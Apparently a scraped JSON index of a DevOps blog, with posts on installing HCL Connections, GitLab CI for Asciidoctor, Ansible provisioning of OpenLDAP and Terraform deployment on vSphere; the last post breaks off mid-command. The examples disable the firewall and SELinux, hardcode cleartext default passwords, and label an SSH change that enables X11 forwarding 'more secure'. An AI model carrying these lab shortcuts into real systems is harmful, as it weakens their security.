https://help.hcltechsw.com/connections/v65/admin/install/c_inst_create_database_sql.html?hl=icec populationWizard.sh asked for the configuration properties of databases and LDAP.\nOn this screen a click on Next does nothing in the GUI. I ran the wizard from the console, so I found following message there:\nSo the Wizard checks the LDAP vendor here, I use OpenLDAP in the test environment, so I’m not surprised that the vendor is not recognized, but I would expect a more visible error message in the UI.\nCreate profiles manually I went to Wizards/TDIPopulation/linux/TDI/ and configured profiles_tdi.properties and map_dbrepos_from_source.properties. Double checked with collect_dns.sh if the LDAP connection works and fired up sync_all_dns.sh. All users were provisioned and I could went to the next step of the installation.\nprofiles_tdi.properties most important parts\nsource_ldap_url=ldap://stoeps-cnx-ldap.devops.example.local source_ldap_search_base=dc=devops,dc=example,dc=local source_ldap_search_filter=(uid=u0000*) source_ldap_user_login=cn=ldapadm,dc=devops,dc=example,dc=local {protect}-source_ldap_user_password={encr}nuncPh0xtEJp00bgeT/wfw8NEwVhlfD= dbrepos_jdbc_url=jdbc:db2://cnx65-db2.devops.example.local:50000/peopledb dbrepos_jdbc_driver=com.ibm.db2.jcc.DB2Driver dbrepos_username=db2inst1 {protect}-dbrepos_password={encr}ca38EsQUBvK0= dbrepos_mark_manager_if_referenced=true TDI encrypts/hashes your password, so just use the cleartext password on the first run\nDatabase connection string\nInstallation Installing Connections with the Installation Manager validates the databases:\nYou see here the XCC database is checked and when I tried to validate it, I got the error that the Highlights database is missing.\nCreate ICEC Highlights database The database creation scripts are included in the Wizards package, but we need to start them manually.\ncd Wizards cd Wizards/connections.sql/icec/db2 db2 -tvf createDb.sql db2 -tvf appGrants.sql Now the validation runs through and I could start the installation.\nI exported the databases scripts with dbWizard.sh, but even there the script is not called.\nAs always the real installation ran around half an hour and ends with\nSidebar, Touchpoint, Invite Like HCL promised the last weeks, all announced apps (Touchpoint, Sidebar, Invite and ICEC) were installed with Connections 6.5 and no additional download or install was necessary.\nUntil now I just tested the legacy WebSphere parts, I will do the Orient Me and Kubernetes parts in some days.\nInvite with new Layout I like the new layout of invite:\nSocial Sidebar The social sidebar seems to need some configuration, so I will check the documentation next year.\n","excerpt":"\u003cp\u003eI used the last day before holiday for a first installation of HCL Connections 6.5 on a test system.\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20191220-install-hcl-connections-6.5/","title":"First install of HCL Connections 6.5"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/linkdump/","title":"Linkdump"},{"body":"First linkdump 2019, it was a busy year until now, with a lot of new topics and tools. Here is a short list of posts and articles I have read the last weeks.\nA quite interesting tool (basic css) for quick web pages: kognise/water.css Devops In Devops we do a lot of scripting, often with bash. Here is a good article on pitfalls.\nBashPitfalls - Greg’s Wiki Security More and more important, you can’t start too early implementing security.\nThe DevOps Security Stack - DevOps.com Announcing GitLab for DevSecOps Post Mortem I like the idea to write down solutions after downtimes, this would cost some time digging into logfiles and write, but in the end it will save time for you and users.\nHow to write an Incident Report / Postmortem Infrastructure as code Since I work with Ansible, Packer and Terraform I don’t miss the time of manual server creation and installation.\nInfrastructure as Code, Part One - CrateDB What is Mutable vs. Immutable Infrastructure? Using Ansible with Terraform Idempotent shell command in Ansible Ansible Idempotency and Configuration Drift Jupyter Advanced Jupyter Notebooks: A Tutorial Books I read some books 2019 (mix of eBook, paper and audio book), here the most important ones:\nLinks pointing to Amazon, no affiliate ones. Please buy your books in your preferred shop.\nPhoenix Project , that’s a must read in my eyes for everybody working in IT.\nInfrastructure as code Devops Handbook My vacation (reading) project: The New World Champion Paper Airplane Book Online Courses I like following such video tutorials, it gives a good entry point to new topics.\nUse Python for Research Introduction to DevOps: Transforming and Improving Operations Kubernetes Certified Administrator by School of Devops Video recordings from GPN Martin Leyrer: Moderne Kommandozeilen Werkzeuge Beyond Monitoring ","excerpt":"\u003cp\u003eFirst linkdump 2019, it was a busy year until now, with a lot of new topics and tools. Here is a short list of posts and articles I have read the last weeks.\u003c/p\u003e\n\u003cp\u003eA quite interesting tool (basic css) for quick web pages: \u003ca href=\"https://github.com/kognise/water.css/blob/master/README.md\" target=\"_blank\"\u003ekognise/water.css \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20190622-linkdump-1_2019/","title":"Linkdump 1/2019"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/reading/","title":"Reading"},{"body":"For GPN19 I prepared a second talk on Documentation with any Editor . The talk was based on a previous one from Froscon 13, but the pipeline tooling changed.\nThis time there was a technical issue during the recording and so there are only the slides available, but you can still watch the video of the Froscon talk: Froscon 13: Documentation with any Editor All scripts and the complete pipeline definition can be found in the GPN19-documentation Gitlab Repository .\ntl;dr I use Asciidoctor for documentation for years. It’s just easy to write, has more options than Markdown and I create all kinds of output for colleagues, customers or the web, just from one source. Converting the source to HTML, PDF, EPUB or several other formats, can be done on the command line of any Operating system, in Docker containers or delivery pipelines. I decided to use the Asciidoctor Docker container with Gitlab CI/CD . One of the advantages of Asciidoctor is that it can be easily put into a version control system like Git. I used Git for storing it since the early beginning, so the step to use a pipeline in combination was easy.\nBut why do I use Gitlab instead of other git software and Jenkins ? To be honest, I think it’s easier to start with Gitlab, because it’s completely integrated. Gitlab is available on premises (Docker container, Kubernetes, bare server) and public on https://gitlab.com .\nGoal As the title of the talk mentions, the main advantage to use a pipeline with Asciidoctor is, that you can edit your documents with the editor of your choice (I often use even VIM in a termux session on my mobile phone or tablet). Conversion happens after commit and push to the git repository.\nAdvantage I can be sure that always the latest version is available, changing something (typos, additional information) doesn’t need any copy \u0026amp; paste to whatever other systems.\nBuilding the pipeline and documents Directory structure and documents\n. ├── docker-asciidoctor │ └── Dockerfile ├── documents-personal │ └── basic-example.adoc ├── documents-work │ ├── _attributes.asciidoc │ ├── basic-example.adoc │ ├── configfiles │ │ └── customization │ │ └── themes │ │ └── Theme │ │ ├── applications │ │ │ └── blogs.css │ │ └── custom.css │ ├── example.adoc │ ├── images │ ├── include │ │ ├── network2.adoc │ │ └── network.adoc │ ├── main-example.adoc │ ├── more.asciidoc │ ├── _variables-linux.asciidoc │ ├── _variables-project.asciidoc │ └── _variables-win.asciidoc ├── images │ ├── diag-4e35056b3ac38736b7ce541f3f9bcced.png │ ├── icons │ │ ├── caution.png │ │ ├── example.png │ │ ├── home.png │ │ ├── important.png │ │ ├── LICENSE │ │ ├── next.png │ │ ├── note.png │ │ ├── prev.png │ │ ├── README.adoc │ │ ├── tip.png │ │ ├── up.png │ │ └── warning.png │ ├── logo.png │ ├── png.png │ └── test.png ├── LICENSE ├── pdftheme │ ├── logo.png │ ├── personal-theme.yml │ └── work-theme.yml ├── presentations │ └── slidedeck.adoc ├── public │ ├── html-personal │ ├── html-work │ ├── images │ ├── pdf-personal │ ├── pdf-work │ └── presentations ├── README.adoc ├── scripts │ ├── create-index.sh │ ├── html-conversion.sh │ ├── html-work-conversion.sh │ ├── pdf-conversion.sh │ ├── pdf-work-conversion.sh │ ├── reveal-conversion.sh │ └── scripts └── wiki-articles Git submodule pointing to https://github.com/asciidoctor/docker-asciidoctor Some example files to include in Asciidoctor\nimages folder used with all asciidoc files\npdftheme for company logo on output\nsome scripts for conversion and generating an overview of all documentation\nOutput folder which is published to Gitlab pages\nThe idea was to put documents to documents-work and it will generate html5 with side toc and pdf with a company logo on the title page. The pdf theme adds a logo, author, pages and copyright to the headers and footers of each page. The personal documents just used the default themes.\nThe folder structure is already prepared for confluence wiki and epub, but it’s not implemented until now.\nPipeline definition Just add .gitlab-ci.yml to your repository and Gitlab will run your defined pipeline.\nBuild and test the Docker container I decided to build the container directly in the Gitlab project, run some tests and put it into the included registry. Running Docker in Docker needs some work on the on premises deployments of Gitlab, but it works out of the box on the public one.\nI add the original Github repository as a submodule to my project.\ngit add submodule https://github.com/asciidoctor/docker-asciidoctor gitlab-ci.yml for building the container and tests\nimage: docker:git services: - docker:dind variables: CONTAINER_TEST_IMAGE: registry.gitlab.com/stoeps/$CI_PROJECT_NAME:$CI_BUILD_REF_NAME CONTAINER_RELEASE_IMAGE: registry.gitlab.com/stoeps/$CI_PROJECT_NAME:latest before_script: - docker login -u gitlab-ci-token -p $CI_BUILD_TOKEN registry.gitlab.com - git submodule sync --recursive - git submodule update --init --recursive stages: - build - test - release build: stage: build script: - docker build -t $CONTAINER_TEST_IMAGE docker-asciidoctor - docker push $CONTAINER_TEST_IMAGE only: changes: - docker-asciidoctor/Dockerfile refs: - master variables: - $BUILDCONTAINER test 1: stage: test script: - echo \u0026#34;Run tests here\u0026#34; - docker run -t --rm $CONTAINER_TEST_IMAGE asciidoctor -v | grep \u0026#34;Asciidoctor\u0026#34; only: changes: - docker-asciidoctor/Dockerfile refs: - master variables: - $BUILDCONTAINER test 2: stage: test script: - docker run -t --rm $CONTAINER_TEST_IMAGE asciidoctor-revealjs -v only: changes: - docker-asciidoctor/Dockerfile refs: - master variables: - $BUILDCONTAINER release-image: stage: release script: - echo \u0026#34;Tag Image and push to registry\u0026#34; - docker pull $CONTAINER_TEST_IMAGE - docker tag $CONTAINER_TEST_IMAGE $CONTAINER_RELEASE_IMAGE - docker push $CONTAINER_RELEASE_IMAGE only: changes: - docker-asciidoctor/Dockerfile refs: - master variables: - $BUILDCONTAINER Use docker:git image (work with git repository)\ndind → Docker in Docker\nDefine Variables (Test image and release image name)\nRun this scripts before the build starts (login in to registry, pull submodule)\n3 Stages used in the pipeline (build, test and release)\nJob build in stage build\nRun only when Dockerfile is newer, in branch master and when the $BUILDCONTAINER variable is true\nJob test1 in stage test\nJob release image in stage release\nGet test image from registry\nTag as release image\nPush to registry\nSo the image build runs only when a variable SBUILDCONTAINER is set to true. I did this to save time, because we don’t need to build the container image multiple times. I decided to create a scheduler for the weekend, which sets the variable and is scheduled all week.\nAnd even then, it needs to be a new Dockerfile to run this.\nA successful build looks like this:\nSo we see our three stages and the different jobs. Splitting into stages has some advantages. First of all, jobs are running parallel in one stage, when a stage (or job) is not successful, the following stages do not run.\nBuild the output documents I decided to run the built of the documents separately, so not the best when you want to save build time, but easier to mount the scripts, images, and documents as volumes into the container. After a successful build, the output is copied to the folder public, a script runs to build an overview html page and then it’s published to Gitlab pages.\nI use the script for an overview because I couldn’t find a way to enable directory index for the Gitlab pages.\nTo do so, I added to additional stages (Conversion and Deploy)\nAfter a successful build, the output is copied to the folder public, a script runs to build an overview html page and then it’s published to Gitlab pages.\nI use the script for an overview because I couldn’t find a way to enable directory index for the Gitlab pages.\n... stages: - build - test - release - conversion - deploy ... pdf:personal: stage: conversion script: - echo \u0026#34;Start Asciidoctor conversion\u0026#34; - echo $CONTAINER_IMAGE:$CI_COMMIT_SHA - docker run -t --rm -v $(pwd)/documents-personal:/documents/ -v $(pwd)/images:/images -v $(pwd)/scripts:/scripts $CONTAINER_RELEASE_IMAGE /scripts/pdf-conversion.sh - cp documents-personal/*.pdf public/pdf-personal artifacts: name: \u0026#34;pdf-personal-$CI_COMMIT_TAG\u0026#34; paths: - public/pdf-personal expire_in: 2 hours except: variables: - $BUILDCONTAINER pdf:work: stage: conversion script: - echo \u0026#34;Start Asciidoctor conversion\u0026#34; - echo $CONTAINER_IMAGE:$CI_COMMIT_SHA - docker run -t --rm -v $(pwd)/documents-work:/documents/ -v $(pwd)/images:/images -v $(pwd)/scripts:/scripts -v $(pwd)/pdftheme:/pdftheme/ $CONTAINER_RELEASE_IMAGE /scripts/pdf-work-conversion.sh - cp documents-work/*.pdf public/pdf-work artifacts: name: \u0026#34;pdf-work-$CI_COMMIT_TAG\u0026#34; paths: - public/pdf-work expire_in: 2 hours except: variables: - $BUILDCONTAINER html: stage: conversion script: - echo \u0026#34;Start Asciidoctor conversion\u0026#34; - echo $CONTAINER_IMAGE:$CI_COMMIT_SHA - docker run -t --rm -v $(pwd)/documents-work:/documents/ -v $(pwd)/images:/images -v $(pwd)/scripts:/scripts $CONTAINER_RELEASE_IMAGE /scripts/html-work-conversion.sh - cp documents-work/*.html public/html-work - docker run -t --rm -v $(pwd)/documents-personal:/documents/ -v $(pwd)/images:/images -v $(pwd)/scripts:/scripts $CONTAINER_RELEASE_IMAGE /scripts/html-conversion.sh - cp documents-personal/*.html public/html-personal artifacts: name: \u0026#34;html-$CI_COMMIT_TAG\u0026#34; paths: - public/html-work - public/html-personal - images expire_in: 2 hours except: variables: - $BUILDCONTAINER reveal: stage: conversion script: - echo \u0026#34;Start Asciidoctor conversion\u0026#34; - echo $CONTAINER_IMAGE:$CI_COMMIT_SHA - docker run -t --rm -v $(pwd)/presentations:/documents/ -v $(pwd)/images:/images -v $(pwd)/scripts:/scripts $CONTAINER_RELEASE_IMAGE /scripts/reveal-conversion.sh - cp presentations/*.html public/presentations artifacts: name: \u0026#34;html-$CI_COMMIT_TAG\u0026#34; paths: - public/presentations - images expire_in: 2 hours except: variables: - $BUILDCONTAINER pages: stage: deploy dependencies: - html - reveal - pdf:personal - pdf:work script: - cp -arvf images/* public/images/ - sh scripts/create-index.sh - chmod +r public -R artifacts: paths: - public expire_in: 1 hour only: refs: - master # this job will affect only the \u0026#39;master\u0026#39; branch except: variables: - $BUILDCONTAINER Job pdf:personal in stage conversion\ndocker command, mounting three volumes into the container and convert to pdf then\nCopy resulting documents to public\nSave artifacts, so the outputs of the conversion are saved\nThis time this runs always, except when $BUILDCONTAINER is true\nThe pages job has the other jobs from stage conversion as dependencies, so their artifacts can be used\nbuild an overview of all converted documents\nGitlab Pages When we now look at https://stoeps.gitlab.io/gpn19-documentation , we see the built overview page.\nCheck https://stoeps.gitlab.io/gpn19-documentation/pdf-work/main-example.pdf for an overview of a converted PDF file with title page, logo, plantuml conversion and so on. The source documents can be found in the repository itself with the same name (but extension .adoc).\n","excerpt":"\u003cp\u003eFor \u003ca href=\"https://entropia.de/GPN19\" target=\"_blank\"\u003eGPN19 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n I prepared a second talk on \u003ca href=\"https://share.stoeps.de/GPN19-DocumentationWithAnyEditor.html\" target=\"_blank\"\u003eDocumentation with any Editor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nThe talk was based on a previous one from Froscon 13, but the pipeline tooling changed.\u003c/p\u003e\n\u003cp\u003eThis time there was a technical issue during the recording and so there are only the slides available, but you can still watch the video of the Froscon talk:\n\u003ca href=\"https://media.ccc.de/v/froscon2018-2192-documentation_with_any_editor\" target=\"_blank\"\u003eFroscon 13: Documentation with any Editor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20190610-asciidoctor-for-professional-documentation/","title":"Asciidoctor for Professional Looking Documentation"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/devops/","title":"Devops"},{"body":"In the first two parts of this little devops series, I showed build templates with Packer and deploying virtual-machines with Terraform .\nNow we want to install some more packages on our new servers.\ntl;dr I started using Ansible for deployments some years ago. For example I showed deploying IBM Connections at Social Connections 12 in Vienna .\nFor more details on the functionality, have a look at the post How Ansible Works Ansible uses plain ssh and doesn’t need any additional server or client component.\nYou can run Ansible as a separate task in your deployment pipeline, or add it as post-provisioning task to Terraform. So it runs automatically when Terraform deploys your systems.\nWindows You can use Ansible to deploy Windows Servers too. More interesting is running Ansible from a Windows machine to deploy Linux and Windows servers.\nFor Windows you can use WinRM or SSH to connect for remote management. The SSH support is experimental AFAIK.\nAnsible Installation Ansible is available for all major Linux distributions. Check the documentation for installation instructions .\nLittle project Directory structure of a little Ansible example\n. ├── group_vars │ └── all │ └── main.yml ├── inventory ├── roles │ ├── common │ │ └── tasks │ │ └── main.yml │ └── ldap │ ├── defaults │ │ └── main.yml │ └── tasks │ └── main.yml ├── site.yml └── templates ├── base.ldif.j2 ├── db.ldif.j2 ├── ldap-config.sh.j2 ├── monitor.ldif.j2 └── user-ldap.ldif.j2 In the inventory file you define your servers and group them together.\ninventory\n[gpn19] gpn19-server1 gpn19-server2 [ldap] gpn19-server2 So gpn19-server1 is only in the group gpn19, server gnp19-server2 is part of gpn19 and ldap. There is always a group all with all servers of an inventory file.\nThe Ansible playbook itself is defined as an Yaml-file:\nsite.yml\n--- - hosts: all roles: - common - hosts: ldap roles: - role: ldap So for all hosts the role common will run and on group ldap the role ldap.\nTo make the roles independent of the environment, we use some variables. So it’s enough to just change the variable and the deployment will use different domain and passwords.\ngroup_vars/all/task.yml\n--- ldap: domain: dc=devops,dc=example,dc=com passwordencrypted: \u0026#34;{SSHA}CdGAzVNlrqgLbKo6pebBxuDBBkxokkHm\u0026#34; passwordclear: \u0026#34;password\u0026#34; To keep it simple, the password is defined here in the variable file. Have a look at Ansible Vault to keep your passwords encrypted.\nUsing template files For the ldap deployment we need to change some files on the target server. These are already prepared in the directory templates and use Jinga2 template engine .\ntemplates/ldapconfig.sh.j2\n#!/usr/bin/env bash cd /etc/openldap/slapd.d ldapmodify -Y EXTERNAL -H ldapi:/// -f db.ldif ldapmodify -Y EXTERNAL -H ldapi:/// -f monitor.ldif sleep 5 ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/cosine.ldif ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/nis.ldif ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/inetorgperson.ldif sleep 5 ldapadd -x -w {{ ldap.passwordclear }} -D \u0026#34;cn=ldapadm,{{ ldap.domain }}\u0026#34; -f /etc/openldap/slapd.d/base.ldif sleep 10 ldapadd -x -w {{ ldap.passwordclear }} -D \u0026#34;cn=ldapadm,{{ ldap.domain }}\u0026#34; -f /etc/openldap/slapd.d/user-ldap.ldif We can use our variable in Jinga2 and these will be replaced during deployment roles/common/tasks/main.yml\n--- # Disable Firewall during Installation - name: Disable Firewall service: name=firewalld state=stopped enabled=no # Disabe SELinux, most IBM Software is not supported with it - name: Disable SELinux selinux: state: disabled # Increase limits.conf for IBM products - name: Change limits.conf pam_limits: domain: root limit_type: \u0026#39;-\u0026#39; limit_item: nproc value: \u0026#39;16384\u0026#39; - pam_limits: domain: root limit_type: \u0026#39;-\u0026#39; limit_item: nofile value: \u0026#39;65536\u0026#39; - pam_limits: domain: root limit_type: \u0026#39;-\u0026#39; limit_item: stack value: \u0026#39;10240\u0026#39; # Install Unzip - name: Install unzip to support unarchive function of ansible, add xauth package: name={{ item }} state=latest with_items: - unzip - xauth - vim # Configure SSH X11Forward - name: Update SSH configuration to be more secure. lineinfile: dest: \u0026#34;/etc/ssh/sshd_config\u0026#34; regexp: \u0026#34;{{ item.regexp }}\u0026#34; line: \u0026#34;{{ item.line }}\u0026#34; state: present with_items: - regexp: \u0026#34;^X11Forwarding\u0026#34; line: \u0026#34;X11Forwarding yes\u0026#34; - regexp: \u0026#34;^X11UseLocalhost\u0026#34; line: \u0026#34;X11UseLocalhost no\u0026#34; - name: Restart SSH service: name=sshd state=restarted enabled=yes Stop Firewalld and set to disabled\nConfigure some limits in limits.conf\nInstall additional packages (independent of yum or apt)\nroles/ldap/tasks/main.yml\n--- - name: Install system packages for OpenLDAP package: name={{ item }} state=latest with_items: - openldap-servers - openldap-clients - name: Enable Slapd service service: name=slapd state=restarted enabled=yes - name: Initial ldap config, copy templates db.ldif template: src=db.ldif.j2 dest=/etc/openldap/slapd.d/db.ldif tags: parse - name: Initial ldap config, copy templates monitor.ldif template: src=monitor.ldif.j2 dest=/etc/openldap/slapd.d/monitor.ldif tags: parse - name: Create base.ldif template: src=base.ldif.j2 dest=/etc/openldap/slapd.d/base.ldif tags: parse - name: Create user.ldif template: src=user-ldap.ldif.j2 dest=/etc/openldap/slapd.d/user-ldap.ldif tags: parse - name: Copy sample db config copy: src: \u0026#34;/usr/share/openldap-servers/DB_CONFIG.example\u0026#34; dest: \u0026#34;/var/lib/ldap/DB_CONFIG\u0026#34; remote_src: yes directory_mode: yes owner: ldap group: ldap - name: Create LDAP Config Script template: src: ldap-config.sh.j2 dest: /tmp/ldap-config.sh mode: 0755 tags: parse - name: Configure LDAP and Import Users shell: \u0026#34;/tmp/ldap-config.sh\u0026#34; - name: Remove config script file: path: /tmp/ldap-config.sh state: absent Enable slapd service\nCopy db.ldif.j2 from templates to dest\nRun Ansible Playbook To run this playbook with our inventory file, just run:\nansible-playbook -i inventory site.yml So now you’re prepared to build new servers and deploy software on it. Have fun!\nAnsible Galaxy On Ansible Galaxy you can share and download Ansible roles. So start new projects searching there, don’t start from scratch.\nGalaxy is a hub for finding and sharing Ansible content.\nUse Galaxy to jump-start your automation project with great content from the Ansible community. Galaxy provides pre-packaged units of work known to Ansible as Roles, and new in Galaxy 3.2, Collections.\nRoles can be dropped into Ansible PlayBooks and immediately put to work. You’ll find roles for provisioning infrastructure, deploying applications, and all of the tasks you do everyday. The new Collection format provides a comprehensive package of automation that may include multiple playbooks, roles, modules, and plugins.\nGulasch Programmiernacht The content of this series was part of my talk at the GPN19. So you can watch a video of the talk too:\n\u0026lt;iframe width=\u0026ldquo;1024\u0026rdquo; height=\u0026ldquo;576\u0026rdquo; src=\u0026ldquo;https://media.ccc.de/v/gpn19-111-automate-your-virtual-server-deployments/oembed\" frameborder=\u0026ldquo;0\u0026rdquo; allowfullscreen\u0026gt;\u0026lt;/iframe\u0026gt; ","excerpt":"\u003cp\u003eIn the first two parts of this little devops series, I showed \u003ca href=\"https://stoeps.de/2019/06/02/20190602-packer-template-vsphere/\" target=\"_blank\"\u003ebuild templates with Packer \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and \u003ca href=\"https://stoeps.de/2019/06/05/20190605-terraform-vsphere/\" target=\"_blank\"\u003edeploying virtual-machines with Terraform \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eNow we want to install some more packages on our new servers.\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20190609-ansible-provisioning/","title":"Ansible Provisioning"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/vsphere/","title":"Vsphere"},{"body":"My last article showed how to build a server template with Packer .\nNow we want to use this template to create some servers on VMware vSphere. DNS will be registered manually and all IP addresses will be defined as fixed in the config files.\nThis code is tested with Terraform 0.12.\ntl;dr Terraform provides a good way to implement immutable server life cycle. Immutable means that servers aren’t changed, they get destroyed/deleted and created again when you change something.\nImmutable servers have a big advantage that configuration drift will not take place. I like the fact that you can trust that servers act equally when you use the same configuration over and over again.\nSo we can deploy test and production, deploy patches and still be sure that tests can be trusted.\nWith mutable deployments, it can happen, that servers act differently. Like deploying fix1, fix2 and fix3 on a test server, but in production, you deploy just fix3 (which is cumulative and have all fixes included from 1-2). Normally the servers should act equally, but often we see differences during production deployments.\nI think the time of manually deployed systems is over. The amount of time for installing, documenting and patching is just too high.\nMost of the time we have fear running automated tasks on our servers because we’re unsure that there were changes applied, which are not covered in our scripts. You need to see the advantages:\nDocumentation automated (most of the time our definition files are documentation enough)\nReliable server deployments\nAutomated tests can help to deploy patches and updates to all and not only a few systems\nData should be stored on separate disks or storage systems, then it is independent of your servers.\nOften containerization is shown as the solution for immutable deployments. That’s right and I love working with them, but how do you deploy servers running Kubernetes or Docker? I prefer generating virtual machines (automated) instead of using very large containers. So when I can’t limit a container to a single micro service, I create a virtual machine most of the time.\nTerraform installation Just download the zipped binary from https://www.terraform.io/downloads.html and put it into your PATH.\nDownload needed plugins The binary checks all files in your current folder and then download the needed plugins for your deployment.\nJust run\nterraform init Build the first server with Terraform build.tf\nprovider \u0026#34;vsphere\u0026#34; { user : var.vsphere_user password : var.vsphere_password vsphere_server : var.vsphere_server allow_unverified_ssl: true } variable \u0026#34;project_folder\u0026#34; { default: \u0026#34;stoeps-example\u0026#34; } data \u0026#34;vsphere_datacenter\u0026#34; \u0026#34;dc\u0026#34; { name = var.vsphere_datacenter } data \u0026#34;vsphere_datastore\u0026#34; \u0026#34;datastore\u0026#34; { name = var.vsphere_datastore datacenter_id = data.vsphere_datacenter.dc.id } data \u0026#34;vsphere_compute_cluster\u0026#34; \u0026#34;cluster\u0026#34; { name = var.vsphere_cluster datacenter_id = data.vsphere_datacenter.dc.id } data \u0026#34;vsphere_resource_pool\u0026#34; \u0026#34;pool\u0026#34; { name = var.vsphere_resource_pool datacenter_id = data.vsphere_datacenter.dc.id } data \u0026#34;vsphere_network\u0026#34; \u0026#34;network\u0026#34; { name = var.vsphere_network datacenter_id = data.vsphere_datacenter.dc.id } data \u0026#34;vsphere_virtual_machine\u0026#34; \u0026#34;template\u0026#34; { # Name of Template name = var.template datacenter_id = data.vsphere_datacenter.dc.id } resource \u0026#34;vsphere_folder\u0026#34; \u0026#34;folder\u0026#34; { path = \u0026#34;${var.my_devops_folder}/${var.project_folder}\u0026#34; type = \u0026#34;vm\u0026#34; datacenter_id = data.vsphere_datacenter.dc.id } vars.tf\nvariable \u0026#34;vsphere_server\u0026#34; { default: \u0026#34;khnum.example.com\u0026#34; } variable \u0026#34;vsphere_user\u0026#34; { default: \u0026#34;cstoettner@example.com\u0026#34; } variable \u0026#34;vsphere_password\u0026#34; { description: \u0026#34;vsphere server password for the environment\u0026#34; default : \u0026#34;\u0026#34; } variable \u0026#34;vsphere_datacenter\u0026#34; { default: \u0026#34;HVIE\u0026#34; } variable \u0026#34;vsphere_cluster\u0026#34; { default = \u0026#34;HVIE PWR HOSTS\u0026#34; } variable \u0026#34;vsphere_datastore\u0026#34; { default = \u0026#34;devops-01_sas_7.2k_raid10\u0026#34; } variable \u0026#34;vsphere_network\u0026#34; { default = \u0026#34;vm-net-devops\u0026#34; } variable \u0026#34;vsphere_resource_pool\u0026#34; { default = \u0026#34;rp_hvie_devops\u0026#34; } variable \u0026#34;my_devops_folder\u0026#34; { default = \u0026#34;devops\u0026#34; } variable \u0026#34;vsphere_domain\u0026#34; { default = \u0026#34;devops.example.com\u0026#34; } variable \u0026#34;vsphere_dns_servers\u0026#34; { type = list(string) default = [\u0026#34;10.10.85.5\u0026#34;] } variable \u0026#34;admin_user\u0026#34; { default = \u0026#34;root\u0026#34; } variable \u0026#34;admin_password\u0026#34; { default = \u0026#34;password\u0026#34; } variable \u0026#34;template\u0026#34; { default = \u0026#34;centos-76-base\u0026#34; } variable \u0026#34;ssh-pub-key\u0026#34; { # Do not store with your code in git, provide on the commandline! default = \u0026#34;\u0026#34; } User for first SSH login\nPassword for SSH\nDuring provisioning, I run some shell commands to disable the password login for root and putting an SSH Key into /root/.ssh/authorized_keys.\nserver1.tf\nresource \u0026#34;vsphere_virtual_machine\u0026#34; \u0026#34;example-server1\u0026#34; { name : \u0026#34;example-server1\u0026#34; resource_pool_id: data.vsphere_resource_pool.pool.id datastore_id : data.vsphere_datastore.datastore.id num_cpus : 4 memory : 4096 guest_id = data.vsphere_virtual_machine.template.guest_id scsi_type = data.vsphere_virtual_machine.template.scsi_type network_interface { network_id = data.vsphere_network.network.id adapter_type = data.vsphere_virtual_machine.template.network_interface_types[0] } folder = \u0026#34;${var.my_devops_folder}/${var.project_folder}\u0026#34; disk { label = \u0026#34;disk0\u0026#34; size = 100 eagerly_scrub = \u0026#34;false\u0026#34; thin_provisioned = \u0026#34;true\u0026#34; } clone { template_uuid = data.vsphere_virtual_machine.template.id customize { linux_options { host_name = \u0026#34;example-server1\u0026#34; domain = var.vsphere_domain } network_interface { ipv4_address = \u0026#34;10.10.85.95\u0026#34; ipv4_netmask = 24 } ipv4_gateway = \u0026#34;10.10.85.1\u0026#34; dns_server_list = var.vsphere_dns_servers dns_suffix_list = [var.vsphere_domain] } } provisioner \u0026#34;remote-exec\u0026#34; { inline = [ \u0026#34;systemd-machine-id-setup\u0026#34;, \u0026#34;mkdir /root/.ssh\u0026#34;, \u0026#34;touch /root/.ssh/authorized_keys\u0026#34;, \u0026#34;echo ${var.ssh-pub-key} \u0026gt;\u0026gt; /root/.ssh/authorized_keys\u0026#34;, \u0026#34;chown root:root -R /root/.ssh\u0026#34;, \u0026#34;chmod 700 /root/.ssh\u0026#34;, \u0026#34;chmod 600 /root/.ssh/authorized_keys\u0026#34;, \u0026#34;passwd --lock root\u0026#34; ] } connection { host = \u0026#34;${self.default_ip_address}\u0026#34; type = \u0026#34;ssh\u0026#34; user = \u0026#34;root\u0026#34; password = \u0026#34;${var.admin_password}\u0026#34; } } Lock user root, so only key authentication is possible When you want to create multiple servers, you can just duplicate the definition file of server1 and change name and IP addresses, or you use loops and counters.\nNow let’s build the first deployment plan:\nterraform plan -var \u0026#34;vsphere_password=my-funky-password\u0026#34; \\ -var \u0026#34;template=stoeps-centos-20190604\u0026#34; \\ -var \u0026#34;ssh-pub-key=$(cat ~/.ssh/stoeps_rsa.pub)\u0026#34; \\ -out server1.terraform set your password for vSphere here\ntemplate name which should be used for provisioning\ncat the ssh public key to the variable ssh-pub-key\nwrite a deployment file\nProviding the password and key on the command line has a big advantage because then your password isn’t stored in your version control system. On the other side, it will appear in shell history. Bash doesn’t store commands starting with a space into the history, or you set a temporary environment variable to store the password there. The SSH Key will be read from the public key file directly.\nTerraform will show you all resources and information which will be created, changed or destroyed. Don’t forget that Terraform will work with all files of the current folder.\nChanging a variable can trigger a recreation of the whole environment of the current folder, so check carefully what will happen on applying.\nApply the change\nterraform apply server1.terraform Recreate a single server Sometimes destroying or changing all servers is too much. With Terraform you have the option to taint a server, a tainted server will be deleted and created again on the next terraform plan and terraform apply.\nMark server for recreation (taint)\nterraform taint vsphere_virtual_machine.example-server2 The complete name is needed here Destroy servers When you want to delete all servers, you can run\nDestroy servers\nterraform destroy -var \u0026#34;vsphere_password=`echo $TF`\u0026#34; -var \u0026#34;template=stoeps-centos-20190604\u0026#34; -var 